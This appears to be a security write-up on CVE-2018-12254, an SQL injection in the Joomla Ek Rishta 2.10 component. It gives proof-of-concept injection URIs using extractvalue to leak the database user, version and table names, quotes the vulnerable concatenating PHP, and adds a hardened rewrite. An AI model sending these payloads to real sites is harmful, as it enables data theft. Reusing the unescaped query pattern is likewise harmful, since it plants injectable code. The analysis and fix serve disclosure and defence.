CVE-2018-12254 Joomla Component Ek Rishta 2.10 – SQL Injection | Lucideus


Introduction
Joomla! is an independent, open-source content management system (CMS) for publishing web content. It is built on a model–view–controller web application framework that can also be used independently of the CMS.
A component is a kind of Joomla! extension. Components are the essential functional units of Joomla!. When a component generates content, that content is normally displayed in the center of the content area of whichever template is in use. In the case described here, router.php in the Harmis Ek Rishta 2.10 component for Joomla! allows SQL injection via the PATH_INFO of a home/requested_user/Sent%20interest/ URI. The issue has the CVE identifier CVE-2018-12254 and Exploit-DB ID 44893.

Exploitation Lab Environment
  • Joomla! CMS 3.7.0 (hosted on Windows 10, Microsoft Windows [Version 10.0.17134.112]).
  • Harmis Ek Rishta 2.10 component.
  • Firefox Quantum 60.0.2 (64-bit).
Proof Of Concept
  • First, visit the "My Profile" page of the Harmis Ek Rishta extension. The username of the profile used here is T3raByt3.
  • On that page, perform the following SQL injections.
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1'
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(1,user()) #
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(1,version()) #
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(0x0a,concat(0x0a,(select database()))) #
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables))) #

Vulnerability Analysis
Examining router.php (fragment below) shows that $c_id captures the URI segment holding the username and stores the result in the $vars array; from this it follows that the EkrishtaUsrID() function looks up the id of that user (or, in its sibling, the name) in the component's database table.
    // $segments[] is the split URI path; $segments[2] is taken straight from the request
    if (!empty($segments[2]) && $segments[0] == 'requested_user') {
        $c_id = EkrishtaUsrID($segments[2]);
        if ($segments[1] == "Sent interest")
            $vars['rid'] = $c_id;
        else
            $vars['cid'] = $c_id;
    }
Looking up the EkrishtaUsrID() function, the SQL injection occurs because the URI-supplied username is concatenated directly into the query string on the $sql assignment line, with no validation or escaping at all.
    function EkrishtaUsrName($uid)
    {
        $db = JFactory::getDBO();
        // same pattern as below: the id is spliced into the SQL text unescaped
        $sql = "SELECT `username` FROM #__users WHERE `id` = '" . $uid . "'";
        $db->setQuery($sql);
        return $db->loadResult();
    }

    function EkrishtaUsrID($uid_name)
    {
        $db = JFactory::getDBO();
        // vulnerable line: $uid_name comes from the URI and is concatenated without quoting
        $sql = "SELECT `id` FROM #__users WHERE `username` = '" . $uid_name . "'";
        $db->setQuery($sql);
        return $db->loadResult();
    }
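As an added example (not code from the Lucideus post or from the Ek Rishta component), the two lookups and the router branch can be rewritten so that the URI-derived value reaches the database as a quoted literal rather than as raw SQL text. It assumes the Joomla 3.x database API (JFactory::getDbo(), getQuery(), quoteName(), quote()) is available, i.e. that it runs inside a Joomla 3.x component; the Safe-suffixed function names and the 150-character cap (the width of the username column in Joomla 3) are my own choices.

```php
<?php
// Added example: hardened rewrite of the two Ek Rishta lookups and the router branch.
// Not the component's code. Assumes Joomla 3.x (JFactory::getDbo(), JDatabaseQuery,
// quoteName()/quote()) so that the active database driver performs the escaping.

/**
 * Resolve a username taken from a URI segment to a user id.
 * Returns null when the input is not a plausible username or no such user exists.
 */
function EkrishtaUsrIDSafe($uidName)
{
    // Router segments are strings; anything else is rejected before any SQL is built.
    // 150 is assumed here to be the width of #__users.username in Joomla 3.
    if (!is_string($uidName) || $uidName === '' || strlen($uidName) > 150) {
        return null;
    }

    $db    = JFactory::getDbo();
    $query = $db->getQuery(true)
        ->select($db->quoteName('id'))
        ->from($db->quoteName('#__users'))
        // quote() escapes and wraps the value for the current driver, so a payload such
        // as 1' or extractvalue(1,user()) # is compared as a literal username string.
        ->where($db->quoteName('username') . ' = ' . $db->quote($uidName));

    $db->setQuery($query);

    return $db->loadResult();
}

/**
 * Resolve a user id to a username. Ids are integers, so cast rather than quote:
 * any non-numeric input collapses to 0, which matches no user.
 */
function EkrishtaUsrNameSafe($uid)
{
    $db    = JFactory::getDbo();
    $query = $db->getQuery(true)
        ->select($db->quoteName('username'))
        ->from($db->quoteName('#__users'))
        ->where($db->quoteName('id') . ' = ' . (int) $uid);

    $db->setQuery($query);

    return $db->loadResult();
}

/**
 * Router branch equivalent to the fragment above. The value still comes straight
 * from the URI, but the lookup can no longer be turned into a different query.
 */
function ekrishtaParseRequestedUser(array $segments, array &$vars)
{
    if (!empty($segments[2]) && $segments[0] === 'requested_user') {
        $cId = EkrishtaUsrIDSafe($segments[2]);

        if ($cId === null) {
            // Unknown or malformed user: leave $vars untouched rather than
            // propagating an empty id into the component's later queries.
            return;
        }

        if ($segments[1] === 'Sent interest') {
            $vars['rid'] = $cId;
        } else {
            $vars['cid'] = $cId;
        }
    }
}
```

With this form the PoC URIs above would be looked up as literal usernames (no such user exists, so loadResult() returns null) and the router stops without populating $vars; the extractvalue() calls never reach the SQL parser because the driver's quote() has escaped the single quote that previously closed the string.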

PoC Video

Reference Links